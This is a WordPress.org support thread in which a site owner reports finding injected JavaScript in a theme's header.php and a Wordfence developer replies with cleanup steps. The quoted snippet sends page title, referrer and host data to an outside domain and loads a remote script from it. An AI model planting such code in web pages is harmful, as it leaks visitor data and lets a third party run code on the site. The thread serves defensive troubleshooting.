Title: malicious code
Last modified: August 30, 2016

---

# malicious code

 *  Resolved [haychart](https://wordpress.org/support/users/haychart/)
 * (@haychart)
 * [10 years, 5 months ago](https://wordpress.org/support/topic/malicious-code-13/)
 * just found this in my theme header.php file
 * the site was taking ages to load and i noticed it was looking for [http://dentistincameron.com](http://dentistincameron.com)
   so i sarched the files and found this – wordfence didnt report it and i cannot
   find anything to suggest someone hacked in
 * at the minute i am using the free version – updating 5 sites, so will go pro 
   when i have finished – but will that make a differece
 * <script>var a=”; setTimeout(10); var default_keyword = encodeURIComponent(document.
   title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(
   window.location.host); var base = “[http://dentistincameron.com/js/jquery.min.php&#8221](http://dentistincameron.com/js/jquery.min.php&#8221);;
   var n_url = base + “?default_keyword=” + default_keyword + “&se_referrer=” + 
   se_referrer + “&source=” + host; var f_url = base + “?c_utt=snt2014&c_utm=” +
   encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !=
   = ” && se_referrer !== null && se_referrer !== ”){document.write(‘<script type
   =”text/javascript” src=”‘ + f_url + ‘”>’ + ‘<‘ + ‘/script>’);}</script>
 * [https://wordpress.org/plugins/wordfence/](https://wordpress.org/plugins/wordfence/)

Viewing 1 replies (of 1 total)

 *  Plugin Author [WFMattR](https://wordpress.org/support/users/wfmattr/)
 * (@wfmattr)
 * [10 years, 5 months ago](https://wordpress.org/support/topic/malicious-code-13/#post-6716228)
 * If you are using a theme from wordpress.org and haven’t made modifications to
   it manually, you can enable “Scan theme files against repository versions for
   changes” to make sure the theme matches the original files.
 * We also have a guide to cleaning hacked sites, by using some additional Wordfence
   options which may help identify any more malicious files, and it also includes
   recommendations on changing passwords and such:
    [How do I clean my hacked site using Wordfence?](http://docs.wordfence.com/en/How_do_I_clean_my_hacked_site_using_Wordfence%3F)
 * The WordPress.org rules don’t allow us to support the premium version here, so
   can you send your premium question to us by email? You can reach us at:
    presales(
   at) wordfence.com
 * Thanks!
 * -Matt R

Viewing 1 replies (of 1 total)

The topic ‘malicious code’ is closed to new replies.

 * ![](https://ps.w.org/wordfence/assets/icon.svg?rev=2070865)
 * [Wordfence Security - Firewall, Malware Scan, and Login Security](https://wordpress.org/plugins/wordfence/)
 * [Frequently Asked Questions](https://wordpress.org/plugins/wordfence/#faq)
 * [Support Threads](https://wordpress.org/support/plugin/wordfence/)
 * [Active Topics](https://wordpress.org/support/plugin/wordfence/active/)
 * [Unresolved Topics](https://wordpress.org/support/plugin/wordfence/unresolved/)
 * [Reviews](https://wordpress.org/support/plugin/wordfence/reviews/)

 * 1 reply
 * 2 participants
 * Last reply from: [WFMattR](https://wordpress.org/support/users/wfmattr/)
 * Last activity: [10 years, 5 months ago](https://wordpress.org/support/topic/malicious-code-13/#post-6716228)
 * Status: resolved